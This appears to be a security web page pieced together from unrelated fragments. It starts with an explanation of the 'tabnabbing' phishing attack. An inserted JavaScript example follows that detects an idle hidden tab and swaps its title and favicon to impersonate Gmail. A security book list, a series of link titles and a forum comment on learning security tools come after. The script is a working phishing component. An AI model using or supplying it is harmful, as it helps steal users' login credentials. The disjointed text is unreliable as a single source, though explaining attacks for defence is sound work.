
Security


Tabnabbing: A New Type of Phishing Attack. The web is a generative and wild place. Sometimes I think I missed my calling; being devious is so much fun. Too bad my parents brought me up with scruples. Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site.

What we don’t expect is that a page we’ve been looking at will change behind our backs, when we aren’t looking. The attack runs in three steps. A user navigates to your normal-looking site. You detect when the page has lost its focus and hasn’t been interacted with for a while. Then you replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-alike. The only thing the page cannot change is the URL in the address bar.
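As an added illustration (this is not Raskin's original proof-of-concept code), the timing logic behind the attack written as a small state machine that drives the DOM swap. The idle threshold, the target title and the favicon path are assumed placeholders; the example watches the Page Visibility API (`visibilitychange` / `document.hidden`) rather than the focus/blur events the post describes, which is an assumption of this example.

```javascript
// Added example, not the original tabnabbing demo. Assumed values:
// IDLE_MS, the look-alike title and the favicon path are placeholders.
const IDLE_MS = 5000;

// State the attacker's page keeps: is the tab out of view, when did the
// user last touch it, and has the swap already fired.
function createTabnabState(now) {
  return { hidden: false, lastActivity: now, swapped: false };
}

// Tab became hidden or visible. Coming back into view counts as activity,
// going hidden does not (the idle clock keeps running from the last touch).
function onVisibility(state, hidden, now) {
  return { ...state, hidden, lastActivity: hidden ? state.lastActivity : now };
}

// Mouse, keyboard or scroll activity resets the idle clock.
function onActivity(state, now) {
  return { ...state, lastActivity: now };
}

// The decision the attacker's timer makes: fire once, only while the tab is
// out of view, and only after the user has been idle for IDLE_MS.
function shouldSwap(state, now, idleMs = IDLE_MS) {
  return !state.swapped && state.hidden && (now - state.lastActivity) >= idleMs;
}

// Pure description of the swap so it can be inspected without a DOM.
function planSwap(title, faviconHref) {
  return { title, faviconHref };
}

// Apply the swap to a document-like object: new title, new favicon link.
function applySwap(plan, doc) {
  doc.title = plan.title;
  let link = doc.querySelector('link[rel~="icon"]');
  if (!link) {
    link = doc.createElement('link');
    link.rel = 'icon';
    doc.head.appendChild(link);
  }
  link.href = plan.faviconHref;
  return doc;
}

// Browser wiring; skipped under Node so the logic above stays testable.
if (typeof document !== 'undefined') {
  let state = createTabnabState(Date.now());
  document.addEventListener('visibilitychange', () => {
    state = onVisibility(state, document.hidden, Date.now());
  });
  ['mousemove', 'keydown', 'scroll'].forEach((ev) =>
    document.addEventListener(ev, () => { state = onActivity(state, Date.now()); }));
  setInterval(() => {
    if (shouldSwap(state, Date.now())) {
      state = { ...state, swapped: true };
      applySwap(planSwap('Gmail: Email from Google', '/fake-gmail-favicon.ico'), document);
    }
  }, 1000);
}
```

The check a user can still make is the one thing this code cannot touch: the address bar. From a defender's point of view, a tab that has been idle and out of view rewriting its own title and favicon is itself the signal; the browser, not the site, is where the fix has to live.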

I dub this new type of phishing attack “tabnabbing”. Targeted Attacks: there are many ways to potentially improve the efficacy of this attack. Attack Vector. Try it Out. The Fix.

Gynvael.coldwind//vx

Recommended Reading | The Homepage of @attrc. This page lists books that I have found to be highly relevant and useful for learning topics within computer security, digital forensics, incident response, malware analysis, and reverse engineering. These books range from introductory texts to advanced research works. While some of these books may seem dated, the information contained is still very useful to people learning today, and much of the information is essential to becoming proficient in the information security realm. Please note that, in order to avoid ranking individual books, each category is listed in alphabetical order and each book is listed in alphabetical order within its category. If you notice any errors with this page or have books that you think should be listed, then please contact me.

I will only list books that I have personally read and for which I am willing to vouch. Categories: Application Security - Native; Application Security - Web; Cryptography; Database Forensics; Digital Forensics and Incident Response; Linux Usage; Networking.

Schneier on Security.

"Reverse Engineering for Beginners" free book.

30C3 (3/3)

From 0x90 to 0x4c454554, a journey into exploitation.

CS:APP Labs.

$9000 bounty paid for Python bugs.

I realize there's a philosophy that it's best to start from the lowest levels and work one's way up. It's one I can empathize with, in spirit, though I disagree. The same logic means that people shouldn't use static code analysis tools, or valgrind, or even debuggers, until they acquire deep technical knowledge. While I think all of these tools help reinforce the principles. If someone starts with the fixed and unwavering goal of security analysis in mind, then perhaps I can agree with you. If however someone is only curious about security analysis, and finds that spending a year to "grok the theory" is a high barrier, then even clumsy use of semi-automated tools may provide more concrete incentive to learn the underlying skills. While I don't believe you are correct, another question is, how many white hats do we end up with?

Finally, it's also better to have even the script kiddies on the side of good than on the side of lolz.